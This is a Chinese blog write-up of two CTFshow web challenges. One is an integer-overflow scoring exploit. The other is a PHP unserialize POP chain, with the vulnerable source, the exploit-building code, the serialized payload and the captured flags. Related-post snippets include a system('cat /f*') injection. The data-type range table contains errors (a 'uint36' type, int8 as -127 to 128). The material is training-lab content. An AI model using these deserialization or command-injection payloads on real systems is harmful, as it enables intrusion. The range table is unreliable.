CTFshow-菜狗杯-茶歇区-小舔田

最新推荐文章于 2025-03-09 22:02:27 发布
最新推荐文章于 2025-03-09 22:02:27 发布
阅读量1.3k 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: WEB CTF 参数传递 文章标签: 网络安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_31415417/article/details/129075012

茶歇区

题目来源

CTFshow-菜狗杯-WEB

题目考点

多次整数溢出

解题思路

通过整数溢出,拿到flag

解题过程

打开题目链接,得到如下界面,不是很明白题目,貌似是整数溢出漏洞利用;

首先我们需要了解各种数据类型对应的取值范围:

uint8 -> 0-255
uint16 -> 0-65535
uint32 -> 0-4294967295
uint36 -> 0-18446744073709551615
int8 -> -127-128
int16 -> -32768-32767
int32 -> -2147483648-2147483647
int64 -> -9223372036854775808-9223372036854775807

在打开题目页面的咖啡的数量处,输入99999999999999999999,提交

在这里插入图片描述

提交后得到如下反馈

在这里插入图片描述


根据反馈的数字922…807,可以判断为int64,当然一般情况都是int64,这里存在一个疑点,为什么我们传的值已经明显大于9223372036854775807,但是为什么获得的积分是0?

因此当我再次传递999999999999999999时,提示如下

在这里插入图片描述

再次传递999999999999999999时,得到flag

在这里插入图片描述

ctfshow{01be7e5c-4519-4968-9965-a7e821483763}

小舔田

题目来源

CTFshow-菜狗杯-WEB

题目考点

PHP反序列化、对象作属性使用的函数调用

题目源码

<?php
include "flag.php";
highlight_file(__FILE__);

class Moon{
    public $name="月亮";
    public function __toString(){
        return $this->name;
    }
    
    public function __wakeup(){
        echo "我是".$this->name."快来赏我";
    }
}

class Ion_Fan_Princess{
    public $nickname="牛夫人";

    public function call(){
        global $flag;
        if ($this->nickname=="小甜甜"){
            echo $flag;
        }else{
            echo "以前陪我看月亮的时候,叫人家小甜甜!现在新人胜旧人,叫人家".$this->nickname."。\n";
            echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";
        }
    }
    
    public function __toString(){
        $this->call();
        return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;
    }
}

if (isset($_GET['code'])){
    unserialize($_GET['code']);

}else{
    $a=new Ion_Fan_Princess();
    echo $a;
}

解题思路

利用PHP反序列化漏洞,得到flag

解题过程

php序列化,最终的利用点在

echo $flag;

该语句在call函数中,找到调用call函数的地方,显然,是Ion_Fan_Princess类中的tostring方法了,那么想要调用tostring函数,可以利用上面类中的tostring方法,使得$this->name的值为Ion_Fan_Princess对象时,在wakeup方法中触发tostring方法;那么就形成了序列化链;

构造反序列化程序

class Moon{
    public $name;
    public function __toString(){
        return $this->name;
    }

    public function __wakeup(){
        echo "我是".$this->name."快来赏我";
    }
}

class Ion_Fan_Princess{
    public $nickname="小甜甜";

    public function call(){
        global $flag;
        if ($this->nickname=="小甜甜"){
            echo $flag;
        }else{
            echo "以前陪我看月亮的时候,叫人家小甜甜!现在新人胜旧人,叫人家".$this->nickname."。\n";
            echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";
        }
    }

    public function __toString(){
        $this->call();
        return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;
    }
}
$a=new Moon();
$W=new Ion_Fan_Princess();
$a->name=$W;
echo serialize($a);

执行程序,得到输出结果

O:4:"Moon":1:{s:4:"name";O:16:"Ion_Fan_Princess":1:{s:8:"nickname";s:9:"小甜甜";}}

发送请求,得到flag

在这里插入图片描述

ctfshow{968090ea-a3ca-4d7f-a311-9694a614cce6}

CTFSHOW 菜狗田? 解题思路和方法
weixin_58052886的博客
06-14 393
s:9:"小甜甜";点击题目链接,发现页面上的php代码,F12并未发现有用信息。
ctfshow-菜狗-WEB-wp
F1rstb100d
11-14 1676
ctfshow-菜狗-WEB-wp
ctfshow(菜狗
qq_62046696的博客
11-28 6717
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
CTFshow菜狗-misc-wp(详解 脚本 过程 全)
dzqxwzoe的博客
02-02 1339
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
CTF秀--菜狗
m0_59022585的博客
07-09 5448
再使$_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]=system("cat /f*"),查看f开头的文件内容。令_GET=a,则有:$key=_GET,$value=a,有:$$key=$_GET=$$value=$a,可知使用GET传入_GET=flag可以得到flag。令cookie中传入CTFshow-QQ群:=a,则有$_POST['a'],令post中传入a=b,则有$_GET['b']。
CTFSHOW——菜狗
asmartrman的博客
02-19 1861
CTFSHOW——菜狗题解(更新中)
ctfshow菜狗】wp
leekos的博客,分享web安全相关知识~
03-07 2734
ctfshow菜狗】wp
CTFSHOW 菜狗 茶歇 解题思路和方法
weixin_58052886的博客
06-14 441
提交后发现弹出了信息 “你拿了9223372036854775807瓶咖啡,总计获得0分!”,发现数据确实溢出,而且物品数目的最大值:9223372036854775807。点击题目链接,发现出现一个计分板页面,完成题目的条件是得分超过114514,但是FTP余额只有1024,故正常游戏无法获得flag。同时在js代码中也未找到与score有关的参数名,这意味着我们不能通过代码审计的方式完成该题。再次使用9999...999,进行多次提交,直到弹出flag。发现当前得分和FP余额被修改,同时弹出信息。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2891
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
ctfshow-菜狗-web(一)
qq_47804678的博客
11-30 3191
_REQUEST[c][6][0][7][5][8][0][9][4][4],其中$_REQUEST是以任何一种方式请求都可以,c为数组,$_REQUEST请求中传入的值是取的C数组中ID键为[6][0][7][5][8][0][9][4][4]的值。eval()函数中的还是变量嵌套(刚开始以为只需要传最后一个$_的值就好了,没想到是不停的变量嵌套),注意都到在POST中传入。首先是给$_赋值:_=a,再给$a赋值,a=b······以此类推一共有36个$,需要赋值36次。于是我们用POST形式发包,
CTFshow-菜狗-LSB探姬-Is_Not_Obfuscate
qq_31415417的博客
02-17 1203
CTFshow-菜狗-LSB探姬-Is_Not_Obfuscate
CTFshow-菜狗WP
m0_61155226的博客
11-14 6646
然后得到了压缩包中的音频文件,然后发现文件后缀为.wav而不是原本的.mp3,猜测需要使用Silent eye工具 Sound qualit选择high,然后就得到flag啦。这里发现成功破除伪加密(也可以手动修改破伪加密),然后通过文件头判断压缩包中的文件类型为.pyc,并修改文件后缀名为.pyc(否则在线工具无法正常反编译;打开链接发现是看图识美女,要通过30关;访问链接发现是探姬的福利视频(bushi),然后根据提示的摩斯密码不难猜测到黑丝为1,白色为0,然后分割标志为视频的转场动画,
ctfshow菜狗wp
m0_62274649的博客
11-17 2935
菜狗wp
CTFSHOW菜狗 web
羽的博客
11-13 9694
CTFSHOW web
CTFshow-菜狗-值覆盖-遍地飘零
qq_31415417的博客
01-01 578
CTFshow-菜狗-值覆盖-遍地飘零
CTFshow-菜狗-茶歇
最新发布
m0_53669634的博客
03-09 372
题目发现直接根据FP拿根本不可能拿到分数,于是准备查找代码,但是没有发现记录分数的参数。由于全部都是通过整数来计算和提交,想到了整数溢出问题。不同整数类型对应的范围。
CTFshow 菜狗 部分wp
weixin_44770698的博客
02-04 2452
ctfshow 菜狗 web部分练习(暂时不全)
Teabreak-crx插件:专业宴会组织服务与户外婚礼
在这个上下文中,“Đặt tiệc Teabreak”可能是指一个用于组织茶会或茶歇活动的在线服务平台或应用程序,而“.crx”文件扩展名表明这是一个适用于Chrome浏览器的插件文件。CRX是Chrome Web Store中使用的应用程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值